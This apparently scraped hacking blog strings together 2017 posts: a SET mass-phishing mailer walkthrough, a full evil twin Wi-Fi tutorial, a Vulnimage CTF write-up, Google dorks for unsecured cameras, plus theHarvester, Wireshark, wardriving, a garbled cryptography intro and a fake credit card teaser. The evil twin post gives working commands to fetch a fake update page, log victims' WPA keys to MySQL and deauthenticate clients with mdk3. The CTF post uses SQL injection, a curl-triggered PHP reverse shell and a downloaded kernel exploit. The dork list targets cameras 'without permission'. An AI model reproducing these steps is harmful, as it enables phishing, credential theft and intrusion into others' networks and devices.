Tuesday, August 22, 2017

Mass Email Attack Kali Tutorial

Mass email senders is not a new topic for ethical hacking community . Certainly we need to send mass emails during penetration test / phishing tests (to be more specific) . While Phishing tests penetration testers often need to send Bulk emails to the employees of an organisation we are conducting the penetration test for .
Though there are many Bulk Mail sending softwares available out there but there is nothing as good as bulk sending tool that is already present in our favourate penetration testing OS : KALI Linux

Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you

In this post I will be sending mass emails using Kali Linux and SET (Social Engineering Toolkit)

To begin with the Mass email attack , you first we need a Email list that we have either harvested or has been supplied to us by the organisation we are conducting the penetration test for .

Now I will be opening Social Engineering Toolkit , SET :
Simply Open Terminal and type :
se-toolkit
And SET opens Up


Select Social engineering i.e Option 1

Now as we need to do a mass email Attack (Mass Mailer attack select option 5)
Option 5 : Mass Mailer Attack
Then select Option 2 for email mass mailer as this tutorial we deal with Email Mass sender and not the Single Email Address . The Option 1 might be useful spear-phish attacks .

Option 2 : Email Attack Mass Mailer



Now you need to define the path to the email list . This is email_list in our case , just add the file-name with the path .


Now select Option 1 as we will be using a gmail account for sending the Mass emails as we dont have our own SMTP server . In case you have a self email server / SMTP (as done by the professional spammers)server feel free to explore the other options .

Option 1 : Use a Gmail account for email attack

Enter the gmail address . The email address must be correct and you must also have the password for the same to successfully send the emails .

Now enter the name that you want the email recipients to see in the Inbox . This is the Name that will flash first in front of your victim . Pay attention to this field specifically , as this where the actual social engineering takes place .
This could be “Admin” in case of a spear phish attack .

Now the SET will ask you to enter the password for the email account .
Enter the gmail password
Now you have an option to specify weather or not you want to flag this message as high priority . Sometimes this may work and sometimes might make the victim suspicious . So I suggest to use this option as per your suitability .
Screenshot
Now SET will ask you to enter the subject of the email .
Enter the subject of the email
Now the SET will ask you if you want the body of the message to be HTML or Plain Text .
P for plain text or H for html
Enter the body text
Enter the body of the email here . If you chose HTML message then add the HTML tags as well .
Enter Control+C to send the email .
Enter to go back to the main menu

This is how hackers perform mass email attack.


Evil Twin Access Point tutorial Kali-Linux

What is Evil twin access point??



Evil twin access point is a wireless access point that has been installed on a secure network without explicit authorization from a local network administrator, whether added by a well-meaning employee or by a malicious attacker.

To the user, the evil twin looks like a hotspot with a strong signal; that’s because the attacker has not only used the same network name and settings as the “good twin” he is impersonating, he has also physically positioned himself near the end-user so that his signal is likely to be the strongest within range.

If the end-user is tempted by the strong signal and connects manually to the evil twin to access the Internet, or if the user’s computer automatically chooses that connection because it is running in promiscuous mode, the evil twin becomes the user’s Internet access point, giving the attacker the ability to intercept sensitive data such as passwords.

Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you

Step 1:

Login to your kali linux machine..

Establish an internet connection to your host machine..

Now we have to install DHCP server as follows..

Open the terminal and type apt-get install dhcp3-server as show below:


Step 2:

Now we need to configure our DHCP server as below..

Open your terminal and type nano/etc/dhcpd.conf, you should have a blank file opened up on your terminal..

Now type the following shown on the screen shot below


After typing press ctrl+x and then press y and hit enter to save it.

Step 3:

Now download the security update page which the client will see when they open up the web browser..

To do that,

Navigate to, cd /var/www in your terminal and do as follows:

rm index.html

wget http://hackthistv.com/eviltwin.zip

unzip eviltwin.zip

rm eviltwin.zip


Now type the following to start your apache server and mysql:

 /etc/init.d/apache2 start

/etc/init.d/mysql start


Now the mysql is loaded now we have to create a database where we store the WPA/WPA2 password that the client enters into the security update page..

Type the follows:

mysql -u root

       create database evil_twin;

       use evil_twin

       create table wpa_keys(password varchar(64), confirm varchar(64));


In the above screenshot the databse already exists..

Step 5:

Now we need to find our local network adapter interface name and our local ip

Now open the new terminal and type:

ip route (take note of local ip n wired interface)

airmon-ng

airmon-ng start wlan0

clear


NOTE: eth0 is my interface name and 192.168.0.105 is my local ip

airodump-ng-oui-update


airodump-ng -M mon0 (take note of target essid,bssid and channel number)

airbase-ng -e [ESSID] -c [ch. #] -P mon0

NOTE: [ESSID]  is your targets ESSID and [ch. #] targets channel no.


Step 6:

Our evil twin access point is now up and running, we need to configure our tunnel interface so we can create a bridge between our evil twin access point and our wired interface and our tunnel interface is named at0, which was created when we created evil twin access point using airbase..

Don’t close airbase and mysql terminal..

Now open a new terminal and type as follows:

ifconfig at0 192.168.1.129 netmask 255.255.255.128

now we need to add a routing table to enable IP forwarding so we can forward traffic to and fro from our evil twin access point..

so,type the following:

route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE

iptables –append FORWARD –in-interface at0 -j ACCEPT

iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination [LOCALIP ADDRESS:80]

iptables -t nat -A POSTROUTING -j MASQUERADE

dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0

etc/init.d/isc-dhcp-server start


Step 7:

Now we need to force our clients to connect to our evil twin access point and to accomplish this we need to disconnect the clients by performing the de-authentication attack. To do that first we need to create the blacklist file that contains BSSID of the target..

Do as follows :

echo [BSSID] > blacklist

NOTE:[BSSID] BSSID of the target

mdk3 mon0 d -b blacklist -c [CH.#]


Now go back to airbase terminal to check if any client has connected to your evil twin access point..

If he is connected to the evil twin access point he will see the security page as shown below which asks for password..


Where the client enters his WPA/WPA2 password and clicks on update.

Now go over to the mysql terminal and type

 use evil_twin

select * from wpa_keys; {To view the password entered by the victim in our mysql database}


you have successfully harvested the WPA passphrase right from the victim in plain text.

now close all the terminal windows and connect back to the real AP to check whether the password is correct or victim was him/herself was a hacker and tricked you. haha

Although you don’t need to name any AP similar to an existing AP you can also create a random free open WiFi type name to gather the client on your AP and start pentesting.


What is reverse engineering?


Reverse Engineering (RE) is the decompilation of an application, regardless of the programming language that was used to create it, so that one can obtain its source code or any part of it.

The reverse engineer can reuse the obtained code in his own programs or change an existing (already compiled) program to perform in other ways. He can use the knowledge obtained from reverse engineering to improve application programs, also known as bugs. But the most important is that one can get extremely useful ideas by observing how other programmers work and think, thus improve his skills and knowledge!

What comes in our minds when we hear RE, is cracking. Cracking is as old as the programs themselves. To crack a program, means to trace and use a serial number or any other kind of registration data, needed for the proper operation of a program. Therefore, if a shareware program (freely distributed, but with some difficulties, like crippled functions, nag screens or limited capabilities) needs a valid registration data, a reverse engineer can give that information by decompiling a particular part of the program.

In the past, many software companies have blamed others for doing RE in their products and stealing technology and knowledge. Reverse engineering is not limited to computer applications, the same happens with a car, weapons, hi-fi elements etc.




The Harvester Kali Linux Tutorial

This tool is intended to help Penetration testers in the early stages of the penetration test in order to understand the customer footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization.

Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you

The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database.

theharvester gathers information from the following sources:

Google :emails,hosts/subdomains.
Google-profile : Employee names.
Bing search emails, subdomains/hostnames, virtual hosts.
Pgp servers: emails, hosts/subdomains.
LinkedIn Employee names.

how to use theharvester

Open your terminal and type the following command.It displays all the options you can use with theharvester.

theharvester


Search emails and hosts with theharvester

theharvester -d hackthissite.org -l 500 -b google

-d: Domain to search.
-l : Limit the search for specified number
-b: Specify the search engine name.

Search information from all the search engine supported by theharvester.

This is cool feature we can extract maximum information from all the supported search engine in a single command. Full command looks like this:


Search information from all the search engine supported by theharvester.

This is cool feature we can extract maximum information from all the supported search engine in a single command. Full command looks like this:

theharvester -d hackthissite.org -l 500 -b all

You have to add all keyword at the end.


Save scan results into a xml file

You can save scan results into a file . You have to Complete command:

theharvester -d hackthissite.org -l 500 -b all -f result.txt

-f is for specifying a file name where results will be stored.Once your scan is complete Check your home directory for xml file.

Sunday, August 20, 2017

Vulnimage Walkthrough

This blog post contains a walkthrough for the boot-to-root Virtual Machine, Vulnimage. The purpose of this boot-to-root challenge is to test users in network security skill sets which are needed for penetration tests as the user attempts to gain root/system privileges of the remote machine. After determining the IP address of the Vulnimage virtual machine by viewing the show arp table of my layer 3 switch I used the tool, NMAP to the scan the target.



After the NMAP scan had finished, I examined the report and identified that there is an Apache service running on the machine on port (80), I decided this would be where I first force my efforts for gaining root privileges of the machine. At the root of the Apache server I found a link to the myblog.php which I appears to the a blog created by one of the target machine users.


Following the links through the website I was able to find a login page used by the blogger to sign into the blogging service.



After viewing the response from the web server regarding the login attempt, I resent the request for login to repeater tab, I modified the password field and replaced admin with "' or 1=1 -'" which a common SQL injection used for bypass authentication.




As shown in the Burp repeater response report I was able to see that I was successful in bypassing the login page using the credentials ‘admin:’ or 1=1 –” and I was able to make a post on the blog as the “admin” user. While examining the website further I came across a link which would allow me to modify a “users” profile, the specific part that I was able to modify the “sig” value, this would change the “signature” of a user. I changed the signature of the admin user to test. As I was able to change the signature to the value “test”, I then decided to test to see if the webserver was able to change the “sig” field if it was placed within PHP code.


The password field contains “‘ or 1=1 –‘” which bypasses the authenication process.



As shown in the Burp repeater response report I was able to see that I was successful in bypassing the login page using the credentials ‘admin:’ or 1=1 –” and I was able to make a post on the blog as the “admin” user. While examining the website further I came across a link which would allow me to modify a “users” profile, the specific part that I was able to modify the “sig” value, this would change the “signature” of a user. I changed the signature of the admin user to test. As I was able to change the signature to the value “test”, I then decided to test to see if the webserver was able to change the “sig” field if it was placed within PHP code.




After I was able to inject the PHP reverse shell code, I identified that the shell was located in the admin-sig.php file located within the profiles directory, the tool, curl, I was able to activate the PHP reverse shell.




I was able to determine that my shell privilege of www-data, I was currently at the “/” of the remote file system, and the version of the kernel I was working with is “Linux debian 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux”. I found a relevant exploit at “http://exploit-db.com/sploits/2009-therebel.tgz”, I downloaded the exploit and placed it within the /var/www/ directory on my local machine and activated the local Apache server.





Once the exploit was transferred I used the tar command to unpack the .tgz file, once unpacked I ran the script “therebel.sh” and once the script was successfully exploit I checked to see if I have successfully gained root privileges for the shell.




I have successfully exploited the Vulnimage virtual machine and gained a reverse shell from the target and escalated the shell to root permissions, successfully gaining full root control of the target machine.




Wednesday, August 2, 2017

How Hackers Hack Security Camera and Webcams Using Google Dork


HELLO guys ..!!

Today i'll show how hackers get access to IP cameras and webcams without permission.
Before we start i would like to tell that this is only for educational purpose.

So, lets start ..!!

Here are some some dorks.. Just copy it without ( * ) to google search.

* inurl:”CgiStart?page=”
* inurl:/view.shtml
* intitle:”Live View / – AXIS
* inurl:view/view.shtml
* inurl:ViewerFrame?Mode=
* inurl:ViewerFrame?Mode=Refresh
* inurl:axis-cgi/jpg
* inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
* inurl:view/indexFrame.shtml
* inurl:view/index.shtml
* inurl:view/view.shtml
* liveapplet
* intitle:”live view” intitle:axis
* intitle:liveapplet
* allintitle:”Network Camera NetworkCamera” (disconnected)
* intitle:axis intitle:”video server”
* intitle:liveapplet inurl:LvAppl
* intitle:”EvoCam” inurl:”webcam.html”
* intitle:”Live NetSnap Cam-Server feed”
* intitle:”Live View / – AXIS”
* intitle:”Live View / – AXIS 206M”
* intitle:”Live View / – AXIS 206W”
* intitle:”Live View / – AXIS 210?
* inurl:indexFrame.shtml Axis
* inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
* intitle:start inurl:cgistart * intitle:”WJ-NT104 Main Page”
* intitle:snc-z20 inurl:home/
* intitle:snc-cs3 inurl:home/
* intitle:snc-rz30 inurl:home/
* intitle:”sony network camera snc-p1?
* intitle:”sony network camera snc-m1?
* site:.viewnetcam.com -www.viewnetcam.com
* intitle:”Toshiba Network Camera” user login
* intitle:”netcam live image” (disconnected)
* intitle:”i-Catcher Console – Web Monitor

Now click on any google search result. You will get access to unprotected security cameras..!!




Tuesday, August 1, 2017

A Brief Introduction to Cryptography


Nowadays the Internet is an important part of Life.  We are using the Internet for sending confidential data also like password, for storing army secrets. But the Internet is insecure medium.  Do you know why?

Insecure Medium:
Imagine you are sending a data.  In the internet world, data are separated as packets and send to the destination.  Do you think the data directly reaching the destination?   If you think so, ) .you are wrong.  The packets are going through different routers.  Finally, the data is sent to the user.  In this gap, Intruders(i mean attackers) takes advantages.  Intruders can see what you are sending.  Because your data are simple and easy to readable by anyone.

How to secure the data?
We can not stop the intruders and their activities.  But we can make our data as Unreadable for Intruders.  For this purpose, the Cryptography is introduced.

Introduction to Cryptography:
Julius Ceaser who introduce the Cryptography technology.  Cryptography is technology in which we are changing the plain text to unreadable text(known as cypher t).

In your home you put money in the locker,  Isn’t it?  The locker probably has the key to open. Imagine thief is coming to your home to steal.  if he wants to open the locker, certainly he needs the key.  Without the key, he can not do. Yeah, I can hear what you are saying, he can break the locker.  If the locker is very strong, he can not open it at all.

Likewise in cryptography also we are going to create a Key for our data.  So that Intruders can not read the data.  It is possible to read the data if the encryption(will explain later) is weak.  So we need to encryption method very strong.

Terminologies used In cryptography:

Plain Text: original data or text is known as Plain text.

Cipher Text: The encrypted message(unreadable message).

Encryption: Changing the Plain text to unreadable.

Decryption: Changing the cypher text to plain text.

Traditional Encryption Methods:

Ceaser Cipher

Mono Alphabetic Cipher

Play Fair Cipher

Hill cipher

PolyAlphabetic Cipher

Rail Fence Technique.

Ceaser Cipher: Simplest encryption method.  In this method, we are going to replace the alphabets with shifted alphabets.
Eg:
Consider Plain text is:  break
if we use Key is 3, then the cipher text will be  found by:

b+3 r+3 e+3 a+3 k+3
Shifted to three alphabets final ciphertext is:


"euhdn

If the intruders see the cypher text(here “Kuhn”) , hackable .he can not understand anything.   But this method hackable.  Because intruders can try 25 shifts and finally he can get the result.

Many encryption methods are introduced to make better security.

Today  Encryption methods:


AES(Advanced Encryption Standard)
DES(Data Encryption Standard)
RSA(Name of the creators).
MD5(Message Digest -5)
SHA(Secure Hash Algorithm

For the secure transaction, SSL (Secure Socket Layer ) is introduced.


Analyzing Packets in Wireshark


Windows and Macintosh user can download it from here .
 Kali already contains this tool .
 If You have not downloaded kali linux yet click here to download it



How To

1.   Start the wireshark using command line or from menu option.


2.   It will open Wireshark as shown below:


3.  Here we go, we will require monitor mode to start packet sniffing. So, here we will start sniffing using monitor mode.

4.  As soon as start of sniffing, it will start capturing packets.

5.  You will get thousands of packets. We can categorize as per requirement. For example, apply filter as per bssid.

6.  We can filter the packets for only management frame. (wlan.fc.type.==0)

7.  Filter to show only data packets. (wlan.fc.type==2)


Wardriving

Wardriving is a term where a pearson with vehicle and having laptop, wireless card and gps setup, drives in all of the city and identifies status of different wireless access points at different geographical locations in city.

The wireless range can be extended using wireless antennas. To get details about geographical locations you can use gps to find out latitude and longitude.


Get Unlimited Free Trials Using a "Real" Fake Credit Card Number

When I see the words "free trial," I know I'm probably going to have to whip out my credit card and enter in the number to ...